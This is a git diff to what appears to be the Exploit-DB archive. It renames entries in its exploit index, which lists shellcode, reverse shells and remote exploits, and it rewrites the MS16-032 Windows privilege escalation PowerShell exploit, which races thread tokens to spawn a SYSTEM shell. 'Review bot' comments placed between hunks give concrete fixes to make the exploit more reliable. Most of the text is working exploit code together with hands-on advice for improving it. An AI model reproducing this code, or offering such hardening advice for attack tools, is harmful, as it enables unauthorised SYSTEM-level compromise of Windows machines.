diff --git a/files.csv b/files.csv
index 5be144729..de78f331c 100755
--- a/files.csv
+++ b/files.csv
@@ -2868,7 +2868,7 @@ id,file,description,date,author,platform,type,port
 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0
 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0
-3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)",2007-01-25,MoAB,osx,dos,0
+3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby)",2007-01-25,MoAB,osx,dos,0
 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0
 3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0
 3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0
@@ -11735,7 +11735,7 @@ id,file,description,date,author,platform,type,port
 40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0
 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
-40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)",2016-07-11,"Mehmet Ince",php,remote,80
+40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
@@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
-36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
+36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
@@ -35918,7 +35918,7 @@ id,file,description,date,author,platform,type,port
 39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
-39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
+39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
@@ -36003,7 +36003,7 @@ id,file,description,date,author,platform,type,port
 39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
 39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
-39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
+39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
 39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
diff --git a/platforms/windows/local/39719.ps1 b/platforms/windows/local/39719.ps1
index a7e26e702..fe840a96c 100755
--- a/platforms/windows/local/39719.ps1
+++ b/platforms/windows/local/39719.ps1
@@ -15,17 +15,15 @@ function Invoke-MS16-032 { * In order for the race condition to succeed the machine must have 2+ CPU cores. If testing in a VM just make sure to add a core if needed mkay. - * The exploit is pretty reliable, however ~1/6 times it will say it succeeded - but not spawn a shell. Not sure what the issue is but just re-run and profit! * Want to know more about MS16-032 ==> https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html + .DESCRIPTION Author: Ruben Boonen (@FuzzySec) Blog: http://www.fuzzysecurity.com/ License: BSD 3-Clause Required Dependencies: PowerShell v2+ Optional Dependencies: None - E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736 .EXAMPLE C:\PS> Invoke-MS16-032 @@ -209,20 +207,19 @@ function Invoke-MS16-032 { } function Get-SystemToken { - echo "`n[?] Trying thread handle: $Thread" - echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)" + echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" - $CallResult = [Kernel32]::SuspendThread($Thread) + $CallResult = [Kernel32]::SuspendThread($hThread) if ($CallResult -ne 0) { - echo "[!] $Thread is a bad thread, moving on.." + echo "[!] $hThread is a bad thread, exiting.." Return } echo "[+] Thread suspended" echo "[>] Wiping current impersonation token" - $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero) + $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero) if (!$CallResult) { - echo "[!] SetThreadToken failed, moving on.." - $CallResult = [Kernel32]::ResumeThread($Thread) + echo "[!] SetThreadToken failed, exiting.." + $CallResult = [Kernel32]::ResumeThread($hThread) echo "[+] Thread resumed!" Return } 
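Review bot: The three early returns in Get-SystemToken (the "bad thread" SuspendThread branch here, the SetThreadToken branch here, and the NtImpersonateThread branch in the next hunk) all run before the `$script:SysTokenHandle = [IntPtr]::Zero` reset, which the next hunk places after them; on a first run in a session the variable is then unset and `$null -eq 0` is false, and on a re-run it still carries the stale handle from the previous attempt, so the caller's `if ($SysTokenHandle -eq 0) { Return }` does not stop the token race. Move the reset to the first statement of the function, `$script:SysTokenHandle = [IntPtr]::Zero`, ahead of the SuspendThread call. The function also now reads `$hThread` from the enclosing Invoke-MS16-032 scope instead of taking it as a parameter, which works by dynamic scoping but is easy to break; `function Get-SystemToken { Param([IntPtr]$hThread) ... }` with `Get-SystemToken $hThread` at the call site would be clearer. Get-SystemToken's body continues past this hunk.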
@@ -233,27 +230,29 @@ function Invoke-MS16-032 { $SQOS.ImpersonationLevel = 2 #SecurityImpersonation $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) # Undocumented API's, I like your style Microsoft ;) - $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos) + $CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos) if ($CallResult -ne 0) { - echo "[!] NtImpersonateThread failed, moving on.." - $CallResult = [Kernel32]::ResumeThread($Thread) + echo "[!] NtImpersonateThread failed, exiting.." + $CallResult = [Kernel32]::ResumeThread($hThread) echo "[+] Thread resumed!" Return } - + + # Null $SysTokenHandle $script:SysTokenHandle = [IntPtr]::Zero + # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE - $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle) + $CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle) if (!$CallResult) { - echo "[!] OpenThreadToken failed, moving on.." - $CallResult = [Kernel32]::ResumeThread($Thread) + echo "[!] OpenThreadToken failed, exiting.." + $CallResult = [Kernel32]::ResumeThread($hThread) echo "[+] Thread resumed!" Return } echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" echo "[+] Resuming thread.." - $CallResult = [Kernel32]::ResumeThread($Thread) + $CallResult = [Kernel32]::ResumeThread($hThread) } # main() <--- ;) 
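Review bot: Every failure branch in this hunk echoes `[+] Thread resumed!` without looking at what ResumeThread returned, and the same applies to the final ResumeThread after OpenThreadToken succeeds; ResumeThread signals failure with -1 (otherwise the previous suspend count), so a thread that is still suspended is reported as resumed and the process race below then runs against a frozen thread. Replace each unconditional echo with `if ($CallResult -eq -1) { echo "[!] ResumeThread failed" } else { echo "[+] Thread resumed!" }`. None of the exit branches closes `$hThread`, the duplicated thread handle, either; since the script now exits rather than trying another thread, a `[Kernel32]::CloseHandle($hThread)` before each `Return` (CloseHandle is already declared and used further down in the file) would be appropriate. Get-SystemToken starts in the previous hunk.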
@@ -275,62 +274,49 @@ function Invoke-MS16-032 { Return } - # Create array for Threads & TID's - $ThreadArray = @() - $TidArray = @() + echo "[>] Duplicating CreateProcessWithLogonW handle" + $hThread = Get-ThreadHandle - echo "[>] Duplicating CreateProcessWithLogonW handles.." - # Loop Get-ThreadHandle and collect thread handles with a valid TID - for ($i=0; $i -lt 500; $i++) { - $hThread = Get-ThreadHandle - $hThreadID = [Kernel32]::GetThreadId($hThread) - # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray - if ($TidArray -notcontains $hThreadID) { - $TidArray += $hThreadID - if ($hThread -ne 0) { - $ThreadArray += $hThread # This is what we need! - } - } - } - - if ($($ThreadArray.length) -eq 0) { - echo "[!] No valid thread handles were captured, exiting!" + # If no thread handle is captured, the box is patched + if (!$hThread) { + echo "[!] No valid thread handles were captured, exiting!`n" Return } else { - echo "[?] Done, got $($ThreadArray.length) thread handle(s)!" - echo "`n[?] Thread handle list:" - $ThreadArray + echo "[?] Done, using thread handle: $hThread" + } echo "`n[*] Sniffing out privileged impersonation token.." + + # Get handle to SYSTEM access token + Get-SystemToken + + # If we fail a check in Get-SystemToken, skip loop + if ($SysTokenHandle -eq 0) { + Return } - echo "`n[*] Sniffing out privileged impersonation token.." - foreach ($Thread in $ThreadArray){ + echo "`n[*] Sniffing out SYSTEM shell.." + echo "`n[>] Duplicating SYSTEM token" + $hDuplicateTokenHandle = [IntPtr]::Zero + $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) - # Get handle to SYSTEM access token - Get-SystemToken - - echo "`n[*] Sniffing out SYSTEM shell.." 
- echo "`n[>] Duplicating SYSTEM token" - $hDuplicateTokenHandle = [IntPtr]::Zero - $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) - - # Simple PS runspace definition - echo "[>] Starting token race" - $Runspace = [runspacefactory]::CreateRunspace() - $StartTokenRace = [powershell]::Create() - $StartTokenRace.runspace = $Runspace - $Runspace.Open() - [void]$StartTokenRace.AddScript({ - Param ($Thread, $hDuplicateTokenHandle) - while ($true) { - $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle) - } - }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle) - $AscObj = $StartTokenRace.BeginInvoke() - - echo "[>] Starting process race" - # Adding a timeout (10 seconds) here to safeguard from edge-cases - $SafeGuard = [diagnostics.stopwatch]::StartNew() - while ($SafeGuard.ElapsedMilliseconds -lt 10000) { + # Simple PS runspace definition + echo "[>] Starting token race" + $Runspace = [runspacefactory]::CreateRunspace() + $StartTokenRace = [powershell]::Create() + $StartTokenRace.runspace = $Runspace + $Runspace.Open() + [void]$StartTokenRace.AddScript({ + Param ($hThread, $hDuplicateTokenHandle) + while ($true) { + $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle) + } + }).AddArgument($hThread).AddArgument($hDuplicateTokenHandle) + $AscObj = $StartTokenRace.BeginInvoke() + + echo "[>] Starting process race" + # Adding a timeout (10 seconds) here to safeguard from edge-cases + $SafeGuard = [diagnostics.stopwatch]::StartNew() + while ($SafeGuard.ElapsedMilliseconds -lt 10000) { + # StartupInfo Struct $StartupInfo = New-Object STARTUPINFO $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 
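Review bot: The patched-box check `if (!$hThread)` only fires when Get-ThreadHandle returns `$null`; if it returns `[IntPtr]::Zero` on failure, which is what the removed loop's `if ($hThread -ne 0)` filter assumed, PowerShell will most likely treat the non-null struct as true and the script carries on into Get-SystemToken with a zero handle. An explicit comparison, `if ($null -eq $hThread -or $hThread -eq [IntPtr]::Zero)`, catches both shapes. The DuplicateToken result is likewise not checked before the runspace starts hammering SetThreadToken with `$hDuplicateTokenHandle`, which is still zero if the call failed; add `if (!$CallResult) { echo "[!] DuplicateToken failed, exiting.."; Return }` after that call. Get-ThreadHandle and the remainder of Invoke-MS16-032 lie outside this hunk.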
@@ -347,6 +333,18 @@ function Invoke-MS16-032 { 0x00000002, "C:\Windows\System32\cmd.exe", "", 0x00000004, $null, $GetCurrentPath, [ref]$StartupInfo, [ref]$ProcessInfo) + + #--- + # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop. + #--- + # Missing this check used to cause the exploit to fail sometimes. + # If CreateProcessWithLogon fails OpenProcessToken won't succeed + # but we obviously don't have a SYSTEM shell :'( . Should be 100% + # reliable now! + #--- + if (!$CallResult) { + continue + } $hTokenHandle = [IntPtr]::Zero $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) @@ -363,10 +361,10 @@ function Invoke-MS16-032 { $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) - } - - # Kill runspace & stopwatch if edge-case - $StartTokenRace.Stop() - $SafeGuard.Stop() + } + + # Kill runspace & stopwatch if edge-case + $StartTokenRace.Stop() + $SafeGuard.Stop() } \ No newline at end of file
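Review bot: The new `continue` correctly skips OpenProcessToken when CreateProcessWithLogonW fails, but on the success path `$hTokenHandle` opened by OpenProcessToken is never closed in the visible code; the cleanup in the next hunk calls TerminateProcess and CloseHandle only on `hProcess` and `hThread`, so unless the lines between the two hunks (not shown) release it, a 10-second loop that spawns a cmd.exe per iteration leaks one token handle per iteration. Add `$CallResult = [Kernel32]::CloseHandle($hTokenHandle)` beside the existing CloseHandle calls on the non-SYSTEM path. The `#---` banner comment is also longer than the check needs; a single line such as `# Skip this iteration if CreateProcessWithLogonW failed: there is no process whose token could be SYSTEM` says the same. The loop body continues past this hunk.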